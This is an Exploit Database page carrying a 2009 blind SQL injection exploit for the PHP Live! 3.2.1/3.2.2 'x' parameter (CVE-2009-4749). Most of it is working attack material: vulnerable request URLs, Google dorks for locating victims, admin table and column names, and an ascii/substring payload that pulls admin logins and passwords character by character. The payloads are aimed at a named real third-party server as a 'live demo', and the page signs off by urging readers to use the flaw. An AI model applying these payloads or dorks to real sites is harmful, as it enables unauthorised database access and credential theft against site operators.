Exploit Database - Logo

PHP Live! 3.2.1/2 - 'x' Parameter Blind SQL Injection

EDB-ID: 9174 Author: boom3rang Published: 2009-07-16
CVE: CVE-2009-4749 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
PhpLive 3.2.1/2 (x) Blind SQL injection                                       [_][-][X] 
      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___        
     | |/ / || |/ __|___ / __| _ \ __\ \    / / |_  )  \ /  \/ _ \       
     | ' <| __ | (_ |___| (__|   / _| \ \/\/ /   / / () | () \_, /       
     |_|\_\_||_|\___|    \___|_|_\___| \_/\_/   /___\__/ \__/ /_/        
                                                                           
                                                                         
      Red n'black i dress eagle on my chest. 
      It's good to be an ALBANIAN Keep my head up high for that flag i die. 
      Im proud to be an ALBANIAN
   ###################################################################    
    								          
       Author         	: boom3rang		 	                  
       Contact        	: boom3rang[at]live.com                          
       Greetz   	: H!tm@N - KHG - cHs

		  R.I.P redc00de		          
   -------------------------------------------------------------------    
    								          
                  Affected software description    	                  
       Software 	: PhpLive             	                          
       Vendor		: http://www.phplivesupport.com	                  
       Price 	      	: Live Support Download Starts at $89.95          
       Version Vuln.    : v3.2.1 & v3.2.2			          
   -------------------------------------------------------------------    
    								          
    [~] SQLi :						                  
    								          
    http://www.TARGET.com/message_box.php?theme=&l=[USERNAME]&x=[SQLi]           
    http://www.TARGET.com/request.php?l=[USERNAME]&x=[SQLi]         	          
      
                                                                   
    [~]Google Dork :		   				                  
    
    Powered by PHP Live! v3.2.1							    
    Powered by PHP Live! v3.2.2  
    allinurl:"request.php" "deptid"						          
    								          
   -------------------------------------------------------------------    
    								          
    [~] Table_NAME  =  chat_admin
    [~] Column_NAME =  login - password - email - userID - name			                  								          
   -------------------------------------------------------------------    
    								          
    [~] Admin Path :					                  
    								          
    http://www.TARGET.com/phplive	
   -------------------------------------------------------------------		                  
    [~] Live Demo:
    
    http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=1    --> True
    http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=2    --> False

   -------------------------------------------------------------------

    [~] ASCII 

  /**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>100

   -------------------------------------------------------------------
    
    [~] Live Demo ASCII

      True
   http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>48		
      
      False
   http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>127   			
			          
   ============================================================================
   | USE this vulnerability, to improve your skills for Social Engineering  ;)  |
   ============================================================================

# milw0rm.com [2009-07-16]

Related Exploits

Trying to match CVEs (1): CVE-2009-4749
Trying to match OSVDBs (2): 63309, 63310
Other Possible E-DB Search Terms: PHP Live! 3.2.1/2,  PHP Live! 3.2.1,  PHP Live
Date D V Title Author
2006-10-18Download Exploit Code Verified PHP Live Helper 1.17 - Multiple Remote File InclusionMatdhule
2006-06-18Download Exploit Code Verified PHP Live Helper 1.x - 'abs_path' Parameter Remote File InclusionSnIpEr_SA
2006-08-07Download Exploit Code Verified PHP Live Helper 2.0 - 'abs_path' Parameter Remote File InclusionMatdhule
2008-08-18Download Exploit Code Verified PHP live helper 2.0.1 - Multiple VulnerabilitiesGulfTech Se...
2006-07-23Download Exploit Code Verified PHP Live! 3.2.1 - 'help.php' Remote File Inclusionmagnific
2008-02-14Download Exploit Code Verified PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (1)Xar
2009-07-24Download Exploit Code Verified PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (2)skys
2009-09-02Download Exploit Code Verified PHP Live! 3.3 - 'deptid' Parameter SQL Injectionv3n0m
2009-11-24Download Exploit Code Verified OSI Codes PHP Live! Support 3.1 - Remote File InclusionDon Tukulesto
Menu